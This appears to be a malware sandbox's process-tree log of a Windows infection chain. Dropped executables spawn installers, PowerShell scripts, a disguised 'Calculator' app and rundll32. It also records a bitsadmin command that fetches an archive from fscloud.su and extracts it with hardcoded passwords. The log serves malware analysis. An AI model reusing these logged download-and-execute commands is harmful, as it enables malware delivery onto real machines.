                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0xdc,0x108,0x100,0x10c,0x7fffea1446f8,0x7fffea144708,0x7fffea144718
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:9580
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a2-da992-2c6-1cca2-6166303ef4b8b\Hoqizhabyfo.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a2-da992-2c6-1cca2-6166303ef4b8b\Hoqizhabyfo.exe"
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:4764
                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\unrw1pfd.hrt\GcleanerEU.exe /eufive & exit
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:9328
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\unrw1pfd.hrt\GcleanerEU.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\unrw1pfd.hrt\GcleanerEU.exe /eufive
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:2924
                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 252
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • Program crash
                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                  PID:7356
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\enzleguq.1wi\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:5804
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\enzleguq.1wi\installer.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\enzleguq.1wi\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                  7⤵
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                  PID:4904
                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\enzleguq.1wi\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\enzleguq.1wi\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630507832 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                                    8⤵
                                                                                                                                                                                    • Enumerates connected drives
                                                                                                                                                                                    PID:8792
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gsgcb3we.1je\any.exe & exit
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:6304
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\gsgcb3we.1je\any.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\gsgcb3we.1je\any.exe
                                                                                                                                                                                    7⤵
                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                    PID:7092
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\de4wmbcn.kh2\gcleaner.exe /mixfive & exit
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:5644
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\de4wmbcn.kh2\gcleaner.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\de4wmbcn.kh2\gcleaner.exe /mixfive
                                                                                                                                                                                      7⤵
                                                                                                                                                                                        PID:2004
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2004 -s 248
                                                                                                                                                                                          8⤵
                                                                                                                                                                                          • Program crash
                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                          PID:7408
                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zi2zjwjv.hls\autosubplayer.exe /S & exit
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:5460
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\zi2zjwjv.hls\autosubplayer.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\zi2zjwjv.hls\autosubplayer.exe /S
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                          PID:7424
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw5DE8.tmp\tempfile.ps1"
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:8228
                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw5DE8.tmp\tempfile.ps1"
                                                                                                                                                                                              8⤵
                                                                                                                                                                                                PID:9824
                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw5DE8.tmp\tempfile.ps1"
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                  PID:4968
                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw5DE8.tmp\tempfile.ps1"
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                    PID:5372
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw5DE8.tmp\tempfile.ps1"
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                      PID:2852
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw5DE8.tmp\tempfile.ps1"
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                        PID:2552
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw5DE8.tmp\tempfile.ps1"
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                        • Checks for any installed AV software in registry
                                                                                                                                                                                                        PID:8044
                                                                                                                                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                        "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                        • Download via BitsAdmin
                                                                                                                                                                                                        PID:8392
                                                                                                                                                                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pVs6mDmdY1wodMZO -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                          PID:9972
                                                                                                                                                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pKWTDtkOpwTbA5mS -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                          PID:3828
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw5DE8.tmp\tempfile.ps1"
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                            PID:3736
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw5DE8.tmp\tempfile.ps1"
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                              PID:4396
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw5DE8.tmp\tempfile.ps1"
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                PID:2620
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw5DE8.tmp\tempfile.ps1"
                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                  PID:5484
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw5DE8.tmp\tempfile.ps1"
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                    PID:8372
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\MLCgSySS\MLCgSySS.dll" MLCgSySS
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                      PID:4800
                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\MLCgSySS\MLCgSySS.dll" MLCgSySS
                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                        PID:3400
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw5DE8.tmp\tempfile.ps1"
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                      PID:5224
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsw5DE8.tmp\tempfile.ps1"
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                        PID:3212
                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\hSEpaYqcay05G24GmDQdfdTk.exe
                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\hSEpaYqcay05G24GmDQdfdTk.exe"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                            PID:5288
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                              PID:4828
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                PID:9496
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7fffd306dec0,0x7fffd306ded0,0x7fffd306dee0
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:10200
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff7f2a49e70,0x7ff7f2a49e80,0x7ff7f2a49e90
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:10228
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1572,5034353689524033219,15245015473047498898,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9496_969966791" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1612 /prefetch:2
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                      PID:6664
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1572,5034353689524033219,15245015473047498898,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9496_969966791" --mojo-platform-channel-handle=1752 /prefetch:8
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:5212
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1572,5034353689524033219,15245015473047498898,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9496_969966791" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2436 /prefetch:1
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:5232
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1572,5034353689524033219,15245015473047498898,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9496_969966791" --mojo-platform-channel-handle=2072 /prefetch:8
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                            PID:5968
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1572,5034353689524033219,15245015473047498898,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9496_969966791" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2684 /prefetch:1
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                              PID:1576
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1572,5034353689524033219,15245015473047498898,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9496_969966791" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3272 /prefetch:2
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                              PID:3860
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,5034353689524033219,15245015473047498898,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9496_969966791" --mojo-platform-channel-handle=3288 /prefetch:8
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                PID:2948
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,5034353689524033219,15245015473047498898,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9496_969966791" --mojo-platform-channel-handle=3340 /prefetch:8
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:6228
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,5034353689524033219,15245015473047498898,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9496_969966791" --mojo-platform-channel-handle=3596 /prefetch:8
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                    PID:4932
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,5034353689524033219,15245015473047498898,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9496_969966791" --mojo-platform-channel-handle=3792 /prefetch:8
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:3812
                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\U3yYrYsr2wPsPn5kwTGHUUn0.exe
                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\U3yYrYsr2wPsPn5kwTGHUUn0.exe"
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                PID:3856
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3856 -s 1776
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                  PID:4852
                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\s50DlSkPaQ9H1RDPAVs0GOC7.exe
                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\s50DlSkPaQ9H1RDPAVs0GOC7.exe"
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                PID:4532
                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\s50DlSkPaQ9H1RDPAVs0GOC7.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\s50DlSkPaQ9H1RDPAVs0GOC7.exe"
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:1128
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri05f84fa77402bf.exe
                                                                                                                                                                                                                                Fri05f84fa77402bf.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:4904
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri05f84fa77402bf.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri05f84fa77402bf.exe
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:5464
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri05851d7f13.exe
                                                                                                                                                                                                                                Fri05851d7f13.exe
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Modifies system certificate store
                                                                                                                                                                                                                                PID:3532
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2264 -ip 2264
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:2708
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1008 -ip 1008
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                  PID:4340
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1920 -ip 1920
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                  PID:2852
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5264 -ip 5264
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                  PID:984
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5436 -ip 5436
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                  PID:980
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 3692 -ip 3692
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                  PID:4840
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 5484 -ip 5484
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:2088
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 1372 -ip 1372
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                    PID:4988
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 3960 -ip 3960
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                    PID:4616
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 1844 -ip 1844
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                    PID:6456
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 5352 -ip 5352
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                    PID:2164
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2896 -ip 2896
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                    PID:5420
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3300 -ip 3300
                                                                                                                                                                                                                                    1⤵
